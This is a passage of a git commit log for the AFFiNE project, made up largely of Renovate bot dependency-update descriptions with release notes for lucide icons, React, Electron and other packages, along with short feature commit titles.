### [`v0.423.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.423.0 ): New icons 0.423.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.422.0...0.423.0 )
#### New icons 🎨
- `amphora` ([#​1926](https://togithub.com/lucide-icons/lucide/issues/1926 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.422.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.422.0 ): New icons 0.422.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.421.0...0.422.0 )
#### Modified Icons 🔨
- `skull` ([#​2197](https://togithub.com/lucide-icons/lucide/issues/2197 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.421.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.421.0 ): New icons 0.421.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.420.0...0.421.0 )
#### New icons 🎨
- `microchip` ([#​1982](https://togithub.com/lucide-icons/lucide/issues/1982 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `circle-check-big` ([#​2330](https://togithub.com/lucide-icons/lucide/issues/2330 )) by [@​jguddas](https://togithub.com/jguddas )
- `cloud-download` ([#​2355](https://togithub.com/lucide-icons/lucide/issues/2355 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `pentagon` ([#​1918](https://togithub.com/lucide-icons/lucide/issues/1918 )) by [@​jguddas](https://togithub.com/jguddas )
- `square-check-big` ([#​2331](https://togithub.com/lucide-icons/lucide/issues/2331 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.420.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.420.0 ): New icons 0.420.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.419.0...0.420.0 )
#### New icons 🎨
- `omega` ([#​2347](https://togithub.com/lucide-icons/lucide/issues/2347 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `calendar-search` ([#​2351](https://togithub.com/lucide-icons/lucide/issues/2351 )) by [@​jguddas](https://togithub.com/jguddas )
- `cloud-upload` ([#​2352](https://togithub.com/lucide-icons/lucide/issues/2352 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.419.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.419.0 ): New icons 0.419.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.418.0...0.419.0 )
#### New icons 🎨
- `circle-fading-arrow-up` ([#​2287](https://togithub.com/lucide-icons/lucide/issues/2287 )) by [@​mosch](https://togithub.com/mosch )
### [`v0.418.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.418.0 ): New icons 0.418.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.417.0...0.418.0 )
#### New icons 🎨
- `id-card` ([#​1296](https://togithub.com/lucide-icons/lucide/issues/1296 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.417.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.417.0 ): New icons 0.417.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.416.0...0.417.0 )
#### Modified Icons 🔨
- `chart-column-increasing` ([#​2334](https://togithub.com/lucide-icons/lucide/issues/2334 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.416.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.416.0 ): New icons 0.416.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.415.0...0.416.0 )
#### New icons 🎨
- `map-pin-check-inside` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-check` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-minus-inside` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-minus` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-plus-inside` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-plus` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-x-inside` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin-x` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `map-pin-off` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pin` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `map-pinned` ([#​2301](https://togithub.com/lucide-icons/lucide/issues/2301 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.415.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.415.0 ): New icons 0.415.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.414.0...0.415.0 )
#### New icons 🎨
- `square-square` ([#​2241](https://togithub.com/lucide-icons/lucide/issues/2241 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.414.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.414.0 ): New icons 0.414.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.413.0...0.414.0 )
#### New icons 🎨
- `chart-area` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-bar-decreasing` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-bar-increasing` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-bar-stacked` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-column-big` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-column-increasing` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-column-stacked` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-network` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-no-axes-combined` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `chart-spline` ([#​2219](https://togithub.com/lucide-icons/lucide/issues/2219 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.413.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.413.0 ): New icons 0.413.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.412.0...0.413.0 )
#### New icons 🎨
- `dam` ([#​2233](https://togithub.com/lucide-icons/lucide/issues/2233 )) by [@​AndreasSas](https://togithub.com/AndreasSas )
#### Modified Icons 🔨
- `dog` ([#​2249](https://togithub.com/lucide-icons/lucide/issues/2249 )) by [@​jguddas](https://togithub.com/jguddas )
- `key-square` ([#​2277](https://togithub.com/lucide-icons/lucide/issues/2277 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.412.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.412.0 ): New icons 0.412.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.411.0...0.412.0 )
#### New icons 🎨
- `letter-text` ([#​2252](https://togithub.com/lucide-icons/lucide/issues/2252 )) by [@​GRA0007](https://togithub.com/GRA0007 )
### [`v0.411.0`](https://togithub.com/lucide-icons/lucide/compare/0.410.0...0.411.0 )
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.410.0...0.411.0 )
### [`v0.410.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.410.0 ): New icons 0.410.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.409.0...0.410.0 )
#### New icons 🎨
- `philippine-peso` ([#​2231](https://togithub.com/lucide-icons/lucide/issues/2231 )) by [@​kasutu](https://togithub.com/kasutu )
#### Modified Icons 🔨
- `ribbon` ([#​2271](https://togithub.com/lucide-icons/lucide/issues/2271 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.409.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.409.0 ): New icons 0.409.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.408.0...0.409.0 )
#### Modified Icons 🔨
- `calendar-minus` ([#​2265](https://togithub.com/lucide-icons/lucide/issues/2265 )) by [@​jguddas](https://togithub.com/jguddas )
- `eye-off` ([#​2317](https://togithub.com/lucide-icons/lucide/issues/2317 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `eye` ([#​2317](https://togithub.com/lucide-icons/lucide/issues/2317 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `image-plus` ([#​2321](https://togithub.com/lucide-icons/lucide/issues/2321 )) by [@​jguddas](https://togithub.com/jguddas )
- `scan-eye` ([#​2317](https://togithub.com/lucide-icons/lucide/issues/2317 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `view` ([#​2317](https://togithub.com/lucide-icons/lucide/issues/2317 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
</details>
<details>
<summary>nodejs/node (node)</summary>
### [`v20.16.0`](https://togithub.com/nodejs/node/compare/v20.15.1...v20.16.0 )
[Compare Source](https://togithub.com/nodejs/node/compare/v20.15.1...v20.16.0 )
</details>
<details>
<summary>facebook/react (react-refresh)</summary>
### [`v0.14.2`](https://togithub.com/facebook/react/blob/HEAD/CHANGELOG.md#0142-November-2-2015 )
[Compare Source](https://togithub.com/facebook/react/compare/v0.14.1...v0.14.2 )
##### React DOM
- Fixed bug with development build preventing events from firing in some versions of Internet Explorer & Edge
- Fixed bug with development build when using es5-sham in older versions of Internet Explorer
- Added support for `integrity` attribute
- Fixed bug resulting in `children` prop being coerced to a string for custom elements, which was not the desired behavior
- Moved `react` from `dependencies` to `peerDependencies` to match expectations and align with `react-addons-*` packages
### [`v0.14.1`](https://togithub.com/facebook/react/blob/HEAD/CHANGELOG.md#01410-October-14-2020 )
[Compare Source](https://togithub.com/facebook/react/compare/v0.14.0...v0.14.1 )
##### React
- Backport support for the [new JSX transform](https://reactjs.org/blog/2020/09/22/introducing-the-new-jsx-transform.html ) to 0.14.x. ([@​lunaruan](https://togithub.com/lunaruan ) in [#​18299](https://togithub.com/facebook/react/pull/18299 ) and [@​gaearon](https://togithub.com/gaearon ) in [#​20024](https://togithub.com/facebook/react/pull/20024 ))
### [`v0.14.0`](https://togithub.com/facebook/react/blob/HEAD/CHANGELOG.md#0140-October-7-2015 )
[Compare Source](https://togithub.com/facebook/react/compare/v0.13.0...v0.14.0 )
##### Major changes
- Split the main `react` package into two: `react` and `react-dom`. This paves the way to writing components that can be shared between the web version of React and React Native. This means you will need to include both files and some functions have been moved from `React` to `ReactDOM`.
- Addons have been moved to separate packages (`react-addons-clone-with-props`, `react-addons-create-fragment`, `react-addons-css-transition-group`, `react-addons-linked-state-mixin`, `react-addons-perf`, `react-addons-pure-render-mixin`, `react-addons-shallow-compare`, `react-addons-test-utils`, `react-addons-transition-group`, `react-addons-update`, `ReactDOM.unstable_batchedUpdates`).
- Stateless functional components - React components were previously created using React.createClass or using ES6 classes. This release adds a [new syntax](https://reactjs.org/docs/reusable-components.html#stateless-functions ) where a user defines a single [stateless render function](https://reactjs.org/docs/reusable-components.html#stateless-functions ) (with one parameter: `props`) which returns a JSX element, and this function may be used as a component.
- Refs to DOM components as the DOM node itself. Previously the only useful thing you can do with a DOM component is call `getDOMNode()` to get the underlying DOM node. Starting with this release, a ref to a DOM component *is* the actual DOM node. **Note that refs to custom (user-defined) components work exactly as before; only the built-in DOM components are affected by this change.**
##### Breaking changes
- `React.initializeTouchEvents` is no longer necessary and has been removed completely. Touch events now work automatically.
- Add-Ons: Due to the DOM node refs change mentioned above, `TestUtils.findAllInRenderedTree` and related helpers are no longer able to take a DOM component, only a custom component.
- The `props` object is now frozen, so mutating props after creating a component element is no longer supported. In most cases, [`React.cloneElement`](https://reactjs.org/docs/react-api.html#cloneelement ) should be used instead. This change makes your components easier to reason about and enables the compiler optimizations mentioned above.
- Plain objects are no longer supported as React children; arrays should be used instead. You can use the [`createFragment`](https://reactjs.org/docs/create-fragment.html ) helper to migrate, which now returns an array.
- Add-Ons: `classSet` has been removed. Use [classnames](https://togithub.com/JedWatson/classnames ) instead.
- Web components (custom elements) now use native property names. Eg: `class` instead of `className`.
##### Deprecations
- `this.getDOMNode()` is now deprecated and `ReactDOM.findDOMNode(this)` can be used instead. Note that in the common case, `findDOMNode` is now unnecessary since a ref to the DOM component is now the actual DOM node.
- `setProps` and `replaceProps` are now deprecated. Instead, call ReactDOM.render again at the top level with the new props.
- ES6 component classes must now extend `React.Component` in order to enable stateless function components. The [ES3 module pattern](https://reactjs.org/blog/2015/01/27/react-v0.13.0-beta-1.html#other-languages ) will continue to work.
- Reusing and mutating a `style` object between renders has been deprecated. This mirrors our change to freeze the `props` object.
- Add-Ons: `cloneWithProps` is now deprecated. Use [`React.cloneElement`](https://reactjs.org/docs/react-api.html#cloneelement ) instead (unlike `cloneW
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-22 04:12:23 +00:00
pengx17
5acf1b5309
feat: init mobile entry ( #7905 )
2024-08-21 13:17:35 +00:00
EYHN
3db95bafa2
feat(core): use new print pdf api ( #7932 )
2024-08-21 10:06:22 +00:00
renovate
cf086e4018
chore: bump up @keyv/redis version to v3 ( #7935 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@keyv/redis](https://togithub.com/jaredwray/keyv ) | [`^2.8.4` -> `^3.0.0`](https://renovatebot.com/diffs/npm/@keyv%2fredis/2.8.5/3.0.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-21 09:37:17 +00:00
renovate
483fcfb2c7
chore: bump up @blocksuite/icons version to v2.1.63 ( #7845 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@blocksuite/icons](https://togithub.com/toeverything/icons ) | [`2.1.62` -> `2.1.63`](https://renovatebot.com/diffs/npm/@blocksuite%2ficons/2.1.62/2.1.63 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>toeverything/icons (@​blocksuite/icons)</summary>
### [`v2.1.63`](dce7e696b3...d63ff94c9f )
[Compare Source](dce7e696b3...d63ff94c9f )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yMC4xIiwidXBkYXRlZEluVmVyIjoiMzguMjAuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-21 09:20:14 +00:00
renovate
b6a3697793
chore: bump up oxlint version to v0.7.2 ( #7885 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://togithub.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.7.1` -> `0.7.2`](https://renovatebot.com/diffs/npm/oxlint/0.7.1/0.7.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.7.2`](https://togithub.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#072---2024-08-15 )
[Compare Source](972492cc4d...b3e189764f )
##### Features
- [`4d28d03`](https://togithub.com/oxc-project/oxc/commit/4d28d03 ) task/website: Support render `subschemas.all_of` ([#​4800](https://togithub.com/oxc-project/oxc/issues/4800 )) (mysteryven)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-21 09:05:36 +00:00
Cats Juice
23b0db36b9
feat(component): mobile menu support ( #7892 )
2024-08-21 09:05:05 +00:00
renovate
182b2fd62d
chore: bump up electron version to v32 ( #7927 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [electron](https://togithub.com/electron/electron ) | [`^31.0.0` -> `^32.0.0`](https://renovatebot.com/diffs/npm/electron/31.4.0/32.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>electron/electron (electron)</summary>
### [`v32.0.1`](https://togithub.com/electron/electron/compare/v32.0.0...v32.0.1 )
[Compare Source](https://togithub.com/electron/electron/compare/v32.0.0...v32.0.1 )
### [`v32.0.0`](https://togithub.com/electron/electron/releases/tag/v32.0.0 ): electron v32.0.0
[Compare Source](https://togithub.com/electron/electron/compare/v31.4.0...v32.0.0 )
### Release Notes for v32.0.0
#### Features
- Added support for responding to auth requests initiated from utility process via `app#login` event. [#​43317](https://togithub.com/electron/electron/pull/43317 )
- Enabled zstd compression in net http requests. [#​43300](https://togithub.com/electron/electron/pull/43300 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/43301 ))</span>
#### Other Changes
- Updated Chromium to 128.0.6613.36. [#​43328](https://togithub.com/electron/electron/pull/43328 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-21 08:38:21 +00:00
CatsJuice
a43c34feec
fix(core): onboarding switch active state is invisible ( #7928 )
...
close AF-1262
2024-08-21 06:17:31 +00:00
CatsJuice
c9a1a8c3b2
feat(component): access enviroment in components storybook ( #7891 )
...
close AF-1247
2024-08-21 06:04:39 +00:00
CatsJuice
a49b92e4c8
feat(core): adjust sidebar style, add github & learn more ( #7864 )
...
close AF-1202
2024-08-21 05:48:04 +00:00
EYHN
cfe0677b84
refactor(core): adapt to new sync api ( #7929 )
2024-08-21 05:30:34 +00:00
forehalo
b6f46e01c5
test(server): space adapters ( #7903 )
2024-08-21 05:30:30 +00:00
forehalo
e20bdbf925
feat(server): make server storage adapters ( #7902 )
2024-08-21 05:30:26 +00:00
forehalo
6f9f579e5d
feat(server): make an abstraction for ydoc storage ( #7901 )
2024-08-21 05:30:23 +00:00
forehalo
682a01e441
feat(server): make a singleton global mutex service ( #7900 )
2024-08-21 05:30:19 +00:00
Saul-Mirone
6b0c398ae5
chore: bump bs ( #7914 )
2024-08-20 00:24:01 +00:00
renovate
152815c175
chore: bump up all non-major dependencies ( #7921 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@fal-ai/serverless-client](https://togithub.com/fal-ai/fal-js ) ([source](https://togithub.com/fal-ai/fal-js/tree/HEAD/libs/client )) | [`^0.13.0` -> `^0.14.0`](https://renovatebot.com/diffs/npm/@fal-ai%2fserverless-client/0.13.0/0.14.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@napi-rs/cli](https://togithub.com/napi-rs/napi-rs ) | [`3.0.0-alpha.60` -> `3.0.0-alpha.62`](https://renovatebot.com/diffs/npm/@napi-rs%2fcli/3.0.0-alpha.60/3.0.0-alpha.62 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@nx/vite](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.6.0` -> `19.6.1`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.6.0/19.6.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@playwright/test](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.46.1`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.44.1/1.46.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@swc/core](https://swc.rs ) ([source](https://togithub.com/swc-project/swc )) | [`1.7.12` -> `1.7.14`](https://renovatebot.com/diffs/npm/@swc%2fcore/1.7.12/1.7.14 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [i18next](https://www.i18next.com ) ([source](https://togithub.com/i18next/i18next )) | [`23.13.0` -> `23.14.0`](https://renovatebot.com/diffs/npm/i18next/23.13.0/23.14.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [lucide-react](https://lucide.dev ) ([source](https://togithub.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.408.0` -> `^0.428.0`](https://renovatebot.com/diffs/npm/lucide-react/0.408.0/0.428.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [mini-css-extract-plugin](https://togithub.com/webpack-contrib/mini-css-extract-plugin ) | [`2.9.0` -> `2.9.1`](https://renovatebot.com/diffs/npm/mini-css-extract-plugin/2.9.0/2.9.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [napi](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.7` -> `3.0.0-alpha.8` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.6` -> `3.0.0-alpha.7` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [nestjs-throttler-storage-redis](https://togithub.com/kkoomen/nestjs-throttler-storage-redis ) | [`^0.4.1` -> `^0.5.0`](https://renovatebot.com/diffs/npm/nestjs-throttler-storage-redis/0.4.4/0.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [node](https://nodejs.org ) ([source](https://togithub.com/nodejs/node )) | `20.15.1` -> `20.16.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | | minor |
| [nx](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.6.0` -> `19.6.1`](https://renovatebot.com/diffs/npm/nx/19.6.0/19.6.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| openresty/openresty | `1.25.3.1-0-buster` -> `1.25.3.2-0-buster` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | final | patch |
